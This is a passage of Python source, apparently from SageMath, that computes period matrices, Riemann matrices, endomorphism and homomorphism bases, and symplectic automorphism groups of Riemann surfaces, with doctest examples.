# and the b-path are oriented as the x and y axes, i.e.,
# if, when we walk around v in counter-clockwise direction,
# we encounter a_in,b_in,a_out,b_out.
# we can also have that b_in and/or b_out overlaps with
# a_in and/or a_out. If we just score the orientation of
# b_in and b_out individually, we can deal with this
# by just ignoring the overlapping vertex. The "half"
# score will be appropriately complemented at one of the
# next vertices.
a_in=cycles[i][i0-1][0]
a_out=cycles[i][(i0+1)%len(cycles[i])][0]
b_in=cycles[j][i1-1][0]
b_out=cycles[j][(i1+1)%len(cycles[j])][0]
# we can get the angles (and hence the rotation order)
# by taking the arguments of the differences.
a_in_arg=direction(center,a_in)
a_out_arg=direction(center,a_out)
b_in_arg=direction(center,b_in)
b_out_arg=direction(center,b_out)
# we make sure to test overlap on the indices, so no rounding
# problems occur with that.
if (b_in != a_in) and (b_in != a_out):
if ((a_in_arg<b_in_arg<a_out_arg) or
(b_in_arg<a_out_arg<a_in_arg) or
(a_out_arg<a_in_arg<b_in_arg)):
intsum += 1
elif ((a_out_arg<b_in_arg<a_in_arg) or
(b_in_arg<a_in_arg<a_out_arg) or
(a_in_arg<a_out_arg<b_in_arg)):
intsum -= 1
else:
raise RuntimeError("impossible edge orientation")
if (b_out != a_in) and (b_out != a_out):
if ((a_in_arg<b_out_arg<a_out_arg) or
(b_out_arg<a_out_arg<a_in_arg) or
(a_out_arg<a_in_arg<b_out_arg)):
intsum -= 1
elif ((a_out_arg<b_out_arg<a_in_arg) or
(b_out_arg<a_in_arg<a_out_arg) or
(a_in_arg<a_out_arg<b_out_arg)):
intsum += 1
else:
raise RuntimeError("impossible edge orientation")
assert (intsum%2) == 0
intsum = intsum//2
intersectionprod[i][j] = intsum
# Skew Symmetry
intersectionprod[j][i] = -intsum
Gmatrix = Matrix(intersectionprod)
G_normalized,P = Gmatrix.symplectic_form()
if G_normalized.rank() != 2*self.genus:
raise RuntimeError("rank of homology pairing mismatches twice stored genus")
# Define the cycle sets.
acycles = [[] for i in range(self.genus)]
bcycles = [[] for i in range(self.genus)]
# There are g a and b cycles.
for i in range(self.genus):
# Range over the size of the Gram matrix.
for j in range(cn):
# Forms the acycles and bcycles. If the entry in the
# transformation matrix is non-zero, it adds the coefficient at
# that entry, and the corresponding cycle. (also, forms it
# into a loop)
if P[i][j] != 0:
acycles[i] += [(P[i][j],[x for x in cycles[j]]+[cycles[j][0]])]
if P[self.genus + i][j] != 0:
bcycles[i] += [(P[self.genus + i][j],[x for x in cycles[j]]+[cycles[j][0]])]
return acycles + bcycles
def make_zw_interpolator(self, upstairs_edge):
r"""
Given an upstairs edge for which continuation data has been stored,
return a function that computes `z(t),w(t)` , where `t` in `[0,1]` is a
parametrization of the edge.
INPUT:
- ``upstairs_edge`` -- a pair of integer tuples indicating an edge on
the upstairs graph of the surface
OUTPUT:
A tuple (g, d), where g is the function that computes the interpolation
along the edge and d is the difference of the z-values of the end and
start point.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 - z^4 + 1
sage: S = RiemannSurface(f)
sage: _ = S.homology_basis()
sage: g,d = S.make_zw_interpolator([(0,0),(1,0)]);
sage: all(f(*g(i*0.1)).abs() < 1e-13for i in range(10))
True
sage: abs((g(1)[0]-g(0)[0]) - d) < 1e-13
True
"""
eindex = tuple(u[0] for u in upstairs_edge)
i0, i1 = eindex
z_start = self._vertices[i0]
z_end = self._vertices[i1]
currL = self._L[eindex]
windex = upstairs_edge[0][1]
def w_interpolate(t):
if t < 0 or t > 1:
raise ValueError("t outside path range")
if t == 0:
return z_start,currL[0][1][windex]
elif t == 1:
return z_end,currL[-1][1][windex]
while True:
i = bisect(currL,t)
t1, w1 ,epsilon = currL[i]
w1 = w1[windex]
t2, w2, _ = currL[i+1]
w2 = w2[windex]
z0 = (1-t)*z_start+t*z_end
w0 = self._CC(((t2-t)*w1+(t-t1)*w2)/(t2-t1))
try:
desired_result = self._newton_iteration(z0,w0,epsilon)
except ConvergenceError:
pass
else:
return z0,desired_result
#If we did not succeed, we insert a new point in our interpolation list
tnew=t
while True:
tnew = (t1 + tnew)/2
znew = (1-tnew)*self._vertices[i0]+tnew*self._vertices[i1]
try:
neww1 = self._determine_new_w(znew,currL[i][1],epsilon)
except ConvergenceError:
pass
else:
#When *no* ConvergenceError is raised, we have succeeded and we can exit
break
#once the loop has succeeded we insert our new value
t1 = tnew
self._L[eindex].insert(i+1,(t1,neww1,epsilon))
return w_interpolate,(z_end-z_start)
def simple_vector_line_integral(self, upstairs_edge, differentials):
r"""
Perfom vectorized integration along a straight path.
INPUT:
- ``upstairs_edge`` -- a pair of integer tuples corresponding to an edge
of the upstairs graph.
- ``differentials`` -- a list of polynomials; a polynomial `g`
represents the differential `g(z,w)/(df/dw) dz` where `f(z,w)=0` is
the equation defining the Riemann surface.
OUTPUT:
A complex number, the value of the line integral.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 - z^4 + 1
sage: S = RiemannSurface(f); S
Riemann surface defined by polynomial f = -z^4 + w^2 + 1 = 0, with 53 bits of precision
Since we make use of data from homotopy continuation, we need to compute
the necessary data::
sage: M = S.riemann_matrix()
sage: differentials = S.cohomology_basis()
sage: S.simple_vector_line_integral([(0,0),(1,0)], differentials) #abs tol 0.00000001
(1.14590610929717e-16 - 0.352971844594760*I)
..NOTE::
Uses data that "homology_basis" initializes.
"""
w_of_t,Delta_z = self.make_zw_interpolator(upstairs_edge)
V = VectorSpace(self._CC,self.genus)
def integrand(t):
zt,wt = w_of_t(t)
dfdwt = self._fastcall_dfdw(zt,wt)
return V([omega(zt,wt)/dfdwt for omega in differentials])
I=integrate_vector(integrand,self._prec)*Delta_z
return I
def cohomology_basis(self, option=1):
r"""
Compute the cohomology basis of this surface.
INPUT:
- ``option`` -- Presently, this routine uses Singular's ``adjointIdeal``
and passes the ``option`` parameter on. Legal values are 1, 2, 3 ,4,
where 1 is the default. See the Singular documentation for the
meaning. The backend for this function may change, and support for
this parameter may disappear.
OUTPUT:
Returns a list of polynomials `g` representing the holomorphic
differentials `g/(df/dw) dz`, where `f(z,w)=0` is the equation
specifying the Riemann surface.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = z^3*w + w^3 + z
sage: S = RiemannSurface(f)
sage: S.cohomology_basis()
[1, w, z]
"""
if self.genus == 0:
self._differentials = []
return self._differentials[0]
if self._differentials is None:
# Computes differentials from the adjointIdeal using Singular
# First we homogenize
base = self.f.base_ring()
# It's important we use a degree ordering; see below.
R = self._R
k = PolynomialRing(base,names="Z,W,U",order="degrevlex")
dehom = k.Hom(R)([R.gen(0),R.gen(1),R.one()])
fnew = self.f(k.gen(0)/k.gen(2),k.gen(1)/k.gen(2)).numerator()
# We load the relevant functionality into singularlib
import sage.libs.singular.function_factory
sage.libs.singular.function_factory.lib("paraplanecurves.lib")
adjointIdeal = sage.libs.singular.function.singular_function("adjointIdeal")
libsing_options=sage.libs.singular.option.LibSingularVerboseOptions()
# We compute the adjoint ideal (note we need to silence "redefine")
redef_save = libsing_options['redefine']
try:
libsing_options['redefine'] = False
J = adjointIdeal(fnew,option)
finally:
libsing_options['redefine'] = redef_save
# We are interested in the (degree-3) subspace of the adjoint ideal.
# We compute this by intersecting with (Z,W,U)^(degree-3). Then the
# lowest degree generators are a basis of the relevant subspace.
d=fnew.total_degree()
J2 = k.ideal(J).intersection(k.ideal([k.gen(0),k.gen(1),k.gen(2)])**(d-3))
generators = [dehom(c) for c in J2.gens() if c.degree() == d-3]
if len(generators) != self.genus:
raise ValueError("computed regular differentials do not match stored genus")
self._differentials = generators
return self._differentials
def matrix_of_integral_values(self, differentials):
r"""
Compute the path integrals of the given differentials along the homology
basis.
The returned answer has a row for each differential. If the Riemann
surface is given by the equation `f(z,w)=0`, then the differentials are
encoded by polynomials g, signifying the differential `g(z,w)/(df/dw)
dz`.
INPUT:
- ``differentials`` -- a list of polynomials.
OUTPUT:
A matrix, one row per differential, containing the values of the path
integrals along the homology basis of the Riemann surface.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<x,y> = QQ[]
sage: S = RiemannSurface(x^3 + y^3 + 1)
sage: B = S.cohomology_basis()
sage: m = S.matrix_of_integral_values(B)
sage: parent(m)
Full MatrixSpace of 1 by 2 dense matrices over Complex Field with 53 bits of precision
sage: (m[0,0]/m[0,1]).algdep(3).degree() #curve is CM, so the period is quadratic
2
"""
cycles = self.homology_basis()
def normalize_pairs(L):
r"""
Returns a list of edges encoded by the path in L.
The edges are normalized to be in the direction in which
the homotopy continuation should have been computed along them.
"""
R=[]
for i in range(len(L)-1):
if L[i][0]<L[i+1][0]:
R.append((L[i],L[i+1]))
else:
R.append((L[i+1],L[i]))
return R
occurring_edges = set()
occurring_edges.update(*[normalize_pairs(p[1]) for h in cycles for p in h])
integral_dict=dict()
for upstairs_edge in occurring_edges:
integral_dict[upstairs_edge]=self.simple_vector_line_integral(upstairs_edge,differentials)
rows=[]
for cycle in cycles:
V = VectorSpace(self._CC,self.genus).zero()
for multiplicity,loop in cycle:
for i in range(len(loop)-1):
if loop[i][0]<loop[i+1][0]:
direction=1
upstairs_edge=(loop[i],loop[i+1])
else:
direction=-1
upstairs_edge=(loop[i+1],loop[i])
V+=(multiplicity*direction)*integral_dict[upstairs_edge]
rows.append(V)
return Matrix(rows).transpose()
@cached_method
def period_matrix(self):
r"""
Compute the period matrix of the surface.
OUTPUT:
A matrix of complex values.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = z^3*w + w^3 + z
sage: S = RiemannSurface(f, prec=30)
sage: M = S.period_matrix()
The results are highly arbitrary, so it is hard to check if the result
produced is correct. The closely related ``riemann_matrix`` is somewhat
easier to test.::
sage: parent(M)
Full MatrixSpace of 3 by 6 dense matrices over Complex Field with 30 bits of precision
sage: M.rank()
3
"""
differentials = self.cohomology_basis()
differentials = [fast_callable(omega,domain=self._CC)
for omega in self.cohomology_basis()]
PM=self.matrix_of_integral_values(differentials)
return PM
def riemann_matrix(self):
r"""
Compute the Riemann matrix.
OUTPUT:
A matrix of complex values.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = z^3*w + w^3 + z
sage: S = RiemannSurface(f, prec=60)
sage: M = S.riemann_matrix()
The Klein quartic has a Riemann matrix with values is a quadratic
field::
sage: x = polygen(QQ)
sage: K.<a> = NumberField(x^2-x+2)
sage: all(len(m.algdep(6).roots(K)) > 0 for m in M.list())
True
"""
PeriodMatrix = self.period_matrix()
Am = PeriodMatrix[0:self.genus,0:self.genus]
RM = numerical_inverse(Am)*PeriodMatrix[0:self.genus,self.genus:2*self.genus]
return RM
def plot_paths(self):
r"""
Make a graphical representation of the integration paths.
Returns a two dimensional plot containing the branch points (in red) and
the integration paths (obtained from the Voronoi cells of the branch
points). The integration paths are plotted by plotting the points that
have been computed for homotopy continuation, so the density gives an
indication of where numerically sensitive features occur.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<x,y> = QQ[]
sage: S = RiemannSurface(y^2 - x^3 - x)
sage: S.plot_paths()
Graphics object consisting of 2 graphics primitives
"""
from sage.plot.point import point2d
P=[]
#trigger the computation of the homology basis, so that self._L is present
self.homology_basis()
for e in self._L.keys():
z0=self._vertices[e[0]]
z1=self._vertices[e[1]]
def path(t):
z=(1-t)*z0+t*z1
return z
T=self._L[e]
P+=[path(t[0]) for t in T]
plt=point2d(P,size=1)+point2d(self.branch_locus,color="red")
return plt
def plot_paths3d(self,thickness=0.01):
r"""
Return the homology basis as a graph in 3-space.
The homology basis of the surface is constructed by taking the Voronoi
cells around the branch points and taking the inverse image of the edges
on the Riemann surface. If the surface is given by the equation
`f(z,w)`, the returned object gives the image of this graph in 3-space
with coordinates `\left(\operatorname{Re}(z), \operatorname{Im}(z),
\operatorname{Im}(w)\right)`.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<x,y> = QQ[]
sage: S = RiemannSurface(y^2-x^3-x)
sage: S.plot_paths3d()
Graphics3d Object
"""
from sage.plot.graphics import Graphics
from sage.plot.plot3d.shapes2 import point3d, line3d
P = Graphics()
#trigger the computation of the homology basis, so that self._L is present
self.homology_basis()
for e in self._L.keys():
z0 = self._vertices[e[0]]
z1 = self._vertices[e[1]]
def path(t):
z = (1-t)*z0+t*z1
return (z.real_part(),z.imag_part())
T = self._L[e]
color = "blue"
for i in range(self.degree):
P += line3d([path(t[0])+(t[1][i].imag_part(),) for t in T],color=color,thickness=thickness)
for z,ws in zip(self._vertices,self._wvalues):
for w in ws:
P += point3d([z.real_part(),z.imag_part(),w.imag_part()],color="purple", size=20)
return P
def endomorphism_basis(self, b=None, r=None):
r"""
Numerically compute a `\ZZ`-basis for the endomorphism ring.
Let `\left(I | M \right)` be the normalized period matrix (`M` is the
`g\times g` :meth:`riemann_matrix`). We consider the system of matrix
equations `MA + C = (MB + D)M` where `A, B, C, D` are `g\times g`
integer matrices. We determine small integer (near) solutions using LLL
reductions. These solutions are returned as `2g \times 2g` integer
matrices obtained by stacking `\left(D | B\right)` on top of `\left(C |
A\right)`.
INPUT:
- ``b`` -- integer (default provided). The equation coefficients are
scaled by `2^b` before rounding to integers.
- ``r`` -- integer (default: ``b/4``). Solutions that have all
coefficients smaller than `2^r` in absolute value are reported as
actual solutions.
OUTPUT:
A list of `2g \times 2g` integer matrices that, for large enough ``r``
and ``b-r``, generate the endomorphism ring.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<x,y> = QQ[]
sage: S = RiemannSurface(x^3 + y^3 + 1)
sage: B = S.endomorphism_basis(); B #random
[
[1 0] [ 0 -1]
[0 1], [ 1 1]
]
sage: sorted([b.minpoly().disc() for b in B])
[-3, 1]
"""
M = self.riemann_matrix()
return integer_matrix_relations(M,M,b,r)
def homomorphism_basis(self, other, b=None, r=None):
r"""
Numerically compute a `\ZZ`-basis for module of homomorphisms to a given
complex torus.
Given another complex torus (given as the analytic Jacobian of a Riemann
surface), numerically compute a basis for the homomorphism module. The
answer is returned as a list of 2g x 2g integer matrices T=(D, B; C, A)
such that if the columns of (I|M1) generate the lattice defining the
Jacobian of the Riemann surface and the columns of (I|M2) do this for
the codomain, then approximately we have (I|M2)T=(D+M2C)(I|M1), i.e., up
to a choice of basis for `\CC^g` as a complex vector space, we we
realize (I|M1) as a sublattice of (I|M2).
INPUT:
- ``b`` -- integer (default provided). The equation coefficients are
scaled by `2^b` before rounding to integers.
- ``r`` -- integer (default: ``b/4``). Solutions that have all
coefficients smaller than `2^r` in absolute value are reported as
actual solutions.
OUTPUT:
A list of `2g \times 2g` integer matrices that, for large enough ``r``
and ``b-r``, generate the homomorphism module.
EXAMPLES::
sage: S1 = EllipticCurve("11a1").riemann_surface()
sage: S2 = EllipticCurve("11a3").riemann_surface()
sage: [m.det() for m in S1.homomorphism_basis(S2)]
[5]
"""
M1 = self.riemann_matrix()
M2 = other.riemann_matrix()
return integer_matrix_relations(M2,M1,b,r)
def tangent_representation_numerical(self, Rs, other = None):
r"""
Compute the numerical tangent representations corresponding to the
homology representations in ``Rs``.
The representations on homology ``Rs`` have to be given with respect to
the symplectic homology basis of the Jacobian of ``self`` and ``other``.
Such matrices can for example be obtained via
:meth:`endomorphism_basis`.
Let `P` and `Q` be the period matrices of ``self`` and ``other``. Then
for a homology representation `R`, the corresponding tangential
representation `T` satisfies `T P = Q R`.
INPUT:
- ``Rs`` -- a set of matrices on homology to be converted to their
tangent representations.
- ``other`` (default: ``self``) -- the codomain, another Riemann
surface.
OUTPUT:
The numerical tangent representations of the matrices in ``Rs``.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: A.<x,y> = QQ[]
sage: S = RiemannSurface(y^2 - (x^6 + 2*x^4 + 4*x^2 + 8), prec = 100)
sage: P = S.period_matrix()
sage: Rs = S.endomorphism_basis()
sage: Ts = S.tangent_representation_numerical(Rs)
sage: all(((T*P - P*R).norm() < 2^(-80)) for [T, R] in zip(Ts, Rs))
True
"""
if not other:
other = self
P = self.period_matrix()
CCP = P.base_ring()
g = self.genus
Q = other.period_matrix()
Ptsubinv = numerical_inverse((P.transpose())[list(range(g))])
Ts = []
for R in Rs:
QRtsub = ((Q * R).transpose())[list(range(g))]
Tt = Ptsubinv * QRtsub
T = Tt.transpose().change_ring(CCP)
Ts.append(T)
return Ts
def tangent_representation_algebraic(self, Rs, other=None, epscomp=None):
r"""
Compute the algebraic tangent representations corresponding to the
homology representations in ``Rs``.
The representations on homology ``Rs`` have to be given with respect to
the symplectic homology basis of the Jacobian of ``self`` and ``other``.
Such matrices can for example be obtained via
:meth:`endomorphism_basis`.
Let `P` and `Q` be the period matrices of ``self`` and ``other``. Then
for a homology representation `R`, the corresponding tangential
representation `T` satisfies `T P = Q R`.
INPUT:
- ``Rs`` -- a set of matrices on homology to be converted to their
tangent representations.
- ``other`` (default: ``self``) -- the codomain, another Riemann
surface.
- ``epscomp`` -- real number (default: ``2^(-prec + 30)``). Used to
determine whether a complex number is close enough to a root of a
polynomial.
OUTPUT:
The algebraic tangent representations of the matrices in ``Rs``.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: A.<x,y> = QQ[]
sage: S = RiemannSurface(y^2 - (x^6 + 2*x^4 + 4*x^2 + 8), prec = 100)
sage: Rs = S.endomorphism_basis()
sage: Ts = S.tangent_representation_algebraic(Rs)
sage: Ts[0].base_ring().maximal_order().discriminant() == 8
True
"""
if not epscomp:
epscomp = 2**(-self._prec + 30)
QQalg = QQ.algebraic_closure()
def polynomialize_element(alpha):
d = 1
while True:
d += 1
dep = algdep(alpha, d, height_bound = 10^d)
if dep and dep(alpha) < epscomp:
return dep
def algebraize_element(alpha):
alphaPol = polynomialize_element(alpha)
CC = alpha.parent()
for tup in alphaPol.roots(QQalg):
rt = tup[0]
if (alpha - CC(rt)).abs() < epscomp:
return rt
raise AssertionError('No close root found while algebraizing')
def algebraize_matrices(Ts):
nr = Ts[0].nrows()
nc = Ts[0].ncols()
rr = range(nr)
rc = range(nc)
TsAlg = []
for T in Ts:
TAlg = Matrix([[algebraize_element(T[i, j]) for j in rc]
for i in rr])
TsAlg.append(TAlg)
elts = [x for TAl in TsAlg for x in TAl.list()]
eltsAlg = number_field_elements_from_algebraics(elts)[1]
L = eltsAlg[0].parent()
TsAlgL = [ ]
for i in range(len(Ts)):
TAlgL = [ eltsAlg[j] for j in range(i*nr*nc, (i + 1)*nr*nc) ]
TsAlgL.append(Matrix(L, nr, nc, TAlgL))
return TsAlgL
Ts = self.tangent_representation_numerical(Rs, other = other)
return algebraize_matrices(Ts)
def rosati_involution(self, R):
r"""
Computes the Rosati involution of an endomorphism.
The endomorphism in question should be given by its homology
representation with respect to the symplectic basis of the Jacobian.
INPUT:
- ``R`` -- integral matrix.
OUTPUT:
The result of applying the Rosati involution to ``R``.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: A.<x,y> = QQ[]
sage: S = RiemannSurface(y^2 - (x^6 + 2*x^4 + 4*x^2 + 8), prec = 100)
sage: Rs = S.endomorphism_basis()
sage: S.rosati_involution(S.rosati_involution(Rs[1])) == Rs[1]
True
"""
def standard_symplectic_matrix(n):
m = n // 2
one = matrix.identity(m)
zero = matrix.zero(m)
return 1*matrix.block([ [zero, -one], [one, zero] ])
g = self.genus
if len(R.rows()) != 2*g or len(R.columns()) != 2*g:
raise AssertionError("Matrix is not the homology representation of an endomorphism")
J = standard_symplectic_matrix(2*g)
return -J * R.transpose() * J
def symplectic_isomorphisms(self, other = None, hom_basis = None, b = None, r = None):
r"""
Numerically compute symplectic isomorphisms.
INPUT:
- ``other`` (default: ``self``) -- the codomain, another Riemann
surface.
- ``hom_basis`` (default: ``None``) -- a `\ZZ`-basis of the
homomorphisms from ``self`` to ``other``, as obtained from
:meth:`homomorphism_basis`. If you have already calculated this
basis, it saves time to pass it via this keyword argument. Otherwise
the method will calculate it.
- ``b`` -- integer (default provided): as for
:meth:`homomorphism_basis`, and used in its invocation if
(re)calculating said basis.
- ``r`` -- integer (default: ``b/4``). as for
:meth:`homomorphism_basis`, and used in its invocation if
(re)calculating said basis.
OUTPUT:
Returns the combinations of the elements of :meth:`homomorphism_basis`
that correspond to symplectic isomorphisms between the Jacobians of
``self`` and ``other``.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<x,y> = QQ[]
sage: f = y^2 - (x^6 + 2*x^4 + 4*x^2 + 8)
sage: X = RiemannSurface(f, prec = 100)
sage: P = X.period_matrix()
sage: g = y^2 - (x^6 + x^4 + x^2 + 1)
sage: Y = RiemannSurface(g, prec = 100)
sage: Q = Y.period_matrix()
sage: Rs = X.symplectic_isomorphisms(Y)
sage: Ts = X.tangent_representation_numerical(Rs, other = Y)
sage: test1 = all(((T*P - Q*R).norm() < 2^(-80)) for [T, R] in zip(Ts, Rs))
sage: test2 = all(det(R) == 1 for R in Rs)
sage: test1 and test2
True
"""
if not other:
other = self
if hom_basis:
Rs = hom_basis
else:
Rs = self.homomorphism_basis(other = other, b = b, r = r)
r = len(Rs)
g = self.genus
A = PolynomialRing(QQ, r, 'x')
gensA = A.gens()
# Use that the trace is positive definite; we could also put this as an
# extra condition when determining the endomorphism basis to speed up
# that calculation slightly
R = sum( gensA[i]*Rs[i].change_ring(A) for i in range(r) )
tr = (R*self.rosati_involution(R)).trace()
# Condition tr = 2 g creates ellipsoid
M = Matrix(ZZ, r, r, [ tr.derivative(gen1).derivative(gen2)
for gen1 in gensA for gen2 in gensA ])
vs = M.__pari__().qfminim(4*g)[2].sage().transpose()
vs = [ v for v in vs if v * M * v == 4*g ]
vs += [ -v for v in vs ]
RsIso = [ ]
for v in vs:
R = sum( v[i]*Rs[i] for i in range(r) )
if R*self.rosati_involution(R) == 1:
RsIso.append(R)
return RsIso
def symplectic_automorphism_group(self, endo_basis = None, b = None, r = None):
r"""
Numerically compute the symplectic automorphism group as a permutation
group.
INPUT:
- ``endo_basis`` (default: ``None``) -- a `\ZZ`-basis of the
endomorphisms of ``self``, as obtained from
:meth:`endomorphism_basis`. If you have already calculated this
basis, it saves time to pass it via this keyword argument. Otherwise
the method will calculate it.
- ``b`` -- integer (default provided): as for
:meth:`homomorphism_basis`, and used in its invocation if
(re)calculating said basis.
- ``r`` -- integer (default: ``b/4``). as for
:meth:`homomorphism_basis`, and used in its invocation if
(re)calculating said basis.
OUTPUT:
The symplectic automorphism group of the Jacobian of the Riemann
surface. The automorphism group of the Riemann surface itself can be
recovered from this; if the curve is hyperelliptic, then it is
identical, and if not, then one divides out by the central element
corresponding to multiplication by -1.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: A.<x,y> = QQ[]
sage: S = RiemannSurface(y^2 - (x^6 + 2*x^4 + 4*x^2 + 8), prec = 100)
sage: G = S.symplectic_automorphism_group()
sage: G.as_permutation_group().is_isomorphic(DihedralGroup(4))
True
"""
RsAut = self.symplectic_isomorphisms(hom_basis = endo_basis, b = b, r = r)
return MatrixGroup(RsAut)
def __add__(self,other):
r"""
Return the disjoint union of the Riemann surface and the other argument.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface, RiemannSurfaceSum
sage: R.<x,y>=QQ[]
sage: S1 = RiemannSurface(y^2-x^3-x-1)
sage: S1+S1
Riemann surface sum with period lattice of rank 4
"""
return RiemannSurfaceSum([self,other])
def integer_matrix_relations(M1,M2,b=None,r=None):
r"""
Determine integer relations between complex matrices.
Given two square matrices with complex entries of size g, h respectively,
numerically determine an (approximate) ZZ-basis for the 2g x 2h matrices
with integer entries of the shape (D, B; C, A) such that B+M1*A=(D+M1*C)*M2.
By considering real and imaginary parts separately we obtain `2gh` equations
with real coefficients in `4gh` variables. We scale the coefficients by a
constant `2^b` and round them to integers, in order to obtain an integer
system of equations. Standard application of LLL allows us to determine near
solutions.
The user can specify the parameter `b`, but by default the system will
choose a `b` based on the size of the coefficients and the precision with
which they are given.
INPUT:
- ``M1`` -- square complex valued matrix
- ``M2`` -- square complex valued matrix of same size as M1
- ``b`` -- integer (default provided). The equation coefficients are scaled
by `2^b` before rounding to integers.
- ``r`` -- integer (default: ``b/4``). The vectors found by LLL that satisfy
the scaled equations to withing `2^r` are reported as solutions.
OUTPUT:
A list of 2g x 2h integer matrices that, for large enough `r`, `b-r`,
generate the ZZ-module of relevant transformations.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import integer_matrix_relations
sage: M1=M2=matrix(CC,2,2,[sqrt(d) for d in [2,-3,-3,-6]])
sage: T=integer_matrix_relations(M1,M2)
sage: id=parent(M1)(1)
sage: M1t=[id.augment(M1) * t for t in T]
sage: [((m[:,:2]^(-1)*m)[:,2:]-M2).norm() < 1e-13 for m in M1t]
[True, True]
"""
if not(M1.ncols()==M1.nrows() and M2.ncols()==M2.nrows()):
raise ValueError("matrices need to be square")
prec = min(M1.base_ring().precision(),M2.base_ring().precision())
H = max(max( abs(m.real_part()) for m in M1.list()+M2.list()), max( abs(m.imag_part()) for m in M1.list()+M2.list()))
if b is None:
b = prec-5-H.log2().floor()
if r is None:
r = b//4
S = 2**b
if H*S > 2**(prec-4):
raise ValueError("insufficient precision for b=%s"%b)
g1 = M1.ncols()
g2 = M2.ncols()
CC = M1.base_ring() if (M1.base_ring().precision() <= M2.base_ring().precision()) else M2.base_ring()
V = ["%s%s"%(n,i) for n in ["a","b","c","d"] for i in srange(1,1+g1*g2)]
R = PolynomialRing(CC,V)
vars = R.gens()
A = Matrix(R, g1, g2, vars[:g1*g2])
B = Matrix(R, g1, g2, vars[g1*g2:2*g1*g2])
C = Matrix(R, g1, g2, vars[2*g1*g2:3*g1*g2])
D = Matrix(R, g1, g2, vars[3*g1*g2:4*g1*g2])
W = ((M1*A+B) - (M1*C+D)*M2).list()
vars = R.gens()
mt = Matrix(ZZ,[[1 if i==j else 0 for j in range(4*g1*g2)] +
[(S*w.monomial_coefficient(vars[i]).real_part()).round() for w in W] +
[(S*w.monomial_coefficient(vars[i]).imag_part()).round() for w in W] for i in range(len(vars))])
# we compute an LLL-reduced basis of this lattice:
mtL = mt.LLL()
def vectomat(v):
A = Matrix(g1,g2,v[:g1*g2].list())
B = Matrix(g1,g2,v[g1*g2:2*g1*g2].list())
C = Matrix(g1,g2,v[2*g1*g2:3*g1*g2].list())
D = Matrix(g1,g2,v[3*g1*g2:4*g1*g2].list())
return D.augment(B).stack(C.augment(A))
c = 2**r
return [vectomat(v) for v in mtL if all(a.abs() <= c for a in v[g1*g2:])]
class RiemannSurfaceSum(RiemannSurface):
r"""
Represent the disjoint union of finitely many Riemann surfaces.
Rudimentary class to represent disjoint unions of Riemann surfaces. Exists
mainly (and this is the only functionality actually implemented) to
represents direct products of the complex tori that arise as analytic
Jacobians of Riemann surfaces.
INPUT:
- L -- list of RiemannSurface objects
EXAMPLES::
sage: _.<x> = QQ[]
sage: SC = HyperellipticCurve(x^6-2*x^4+3*x^2-7).riemann_surface(prec=60)
sage: S1 = HyperellipticCurve(x^3-2*x^2+3*x-7).riemann_surface(prec=60)
sage: S2 = HyperellipticCurve(1-2*x+3*x^2-7*x^3).riemann_surface(prec=60)
sage: len(SC.homomorphism_basis(S1+S2))
2
"""
def __init__(self,L):
r"""
TESTS::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface, RiemannSurfaceSum
sage: R.<x,y>=QQ[]
sage: S1 = RiemannSurface(y^2-x^3-x-1)
sage: S2 = RiemannSurface(y^2-x^3-x-5)
sage: S = RiemannSurfaceSum([S1,S2])
sage: S.riemann_matrix() == S1.riemann_matrix().block_sum(S2.riemann_matrix())
True
"""
if not all(isinstance(l,RiemannSurface) for l in L):
raise ValueError("summands must be RiemannSurface objects")
prec = min(l._prec for l in L)
self._prec = prec
self.genus = sum(s.genus for s in L)
it = iter(L)
s = next(it)
g = s.genus
PM = s.period_matrix()
PM1 = PM[:g,:g]
PM2 = PM[:g,g:2*g]
tau = s.riemann_matrix()
for s in it:
g = s.genus
PM = s.period_matrix()
PM1 = PM1.block_sum(PM[:g,:g])
PM2 = PM2.block_sum(PM[:g,g:2*g])
tau = tau.block_sum(s.riemann_matrix())
self.PM = block_matrix([[PM1, PM2]], subdivide = False)
self.tau = tau
def period_matrix(self):
r"""
Return the period matrix of the surface.
This is just the diagonal block matrix constructed from the period
matrices of the constituents.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface, RiemannSurfaceSum
sage: R.<x,y>=QQ[]
sage: S1 = RiemannSurface(y^2-x^3-x-1)
sage: S2 = RiemannSurface(y^2-x^3-x-5)
sage: S = RiemannSurfaceSum([S1,S2])
sage: S1S2 = S1.period_matrix().block_sum(S2.period_matrix())
sage: S.period_matrix() == S1S2[[0,1],[0,2,1,3]]
True
"""
return self.PM
def riemann_matrix(self):
r"""
Return the normalized period matrix of the surface.
This is just the diagonal block matrix constructed from the Riemann
matrices of the constituents.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface, RiemannSurfaceSum
sage: R.<x,y>=QQ[]
sage: S1 = RiemannSurface(y^2-x^3-x-1)
sage: S2 = RiemannSurface(y^2-x^3-x-5)
